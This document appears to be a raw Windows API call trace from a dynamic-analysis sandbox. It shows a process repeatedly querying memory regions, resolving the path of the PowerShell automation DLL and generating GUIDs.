	[0317.949] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.949] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.949] VirtualQuery (in: lpAddress=0x1cb5c0, lpBuffer=0x1cc480, dwLength=0x30 | out: lpBuffer=0x1cc480*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.949] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.949] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.949] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.950] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.950] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0xc1ee561f, Data2=0xd134, Data3=0x4366, Data4=([0]=0xa1, [1]=0xf6, [2]=0x97, [3]=0xcc, [4]=0x4a, [5]=0x97, [6]=0xa1, [7]=0x8c))) returned 0x0
	[0317.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.955] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.956] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.956] VirtualQuery (in: lpAddress=0x1cb990, lpBuffer=0x1cc850, dwLength=0x30 | out: lpBuffer=0x1cc850*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.957] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.957] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.957] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.957] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.957] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.957] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.958] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.958] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.958] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.958] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.958] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.958] VirtualQuery (in: lpAddress=0x1cb5c0, lpBuffer=0x1cc480, dwLength=0x30 | out: lpBuffer=0x1cc480*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.958] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.958] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.959] VirtualQuery (in: lpAddress=0x1cb8f0, lpBuffer=0x1cc7b0, dwLength=0x30 | out: lpBuffer=0x1cc7b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.959] VirtualQuery (in: lpAddress=0x1cb980, lpBuffer=0x1cc840, dwLength=0x30 | out: lpBuffer=0x1cc840*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.959] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x6ea11b15, Data2=0x1a04, Data3=0x45f3, Data4=([0]=0x91, [1]=0x6b, [2]=0xa3, [3]=0xc4, [4]=0x22, [5]=0x97, [6]=0x99, [7]=0x4))) returned 0x0
	[0317.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.960] CoCreateGuid (in: pguid=0x1cd170 | out: pguid=0x1cd170*(Data1=0x18a96caa, Data2=0xda43, Data3=0x4a11, Data4=([0]=0xb6, [1]=0xb9, [2]=0xfb, [3]=0x48, [4]=0x95, [5]=0xa7, [6]=0x41, [7]=0x84))) returned 0x0
	[0317.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0317.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
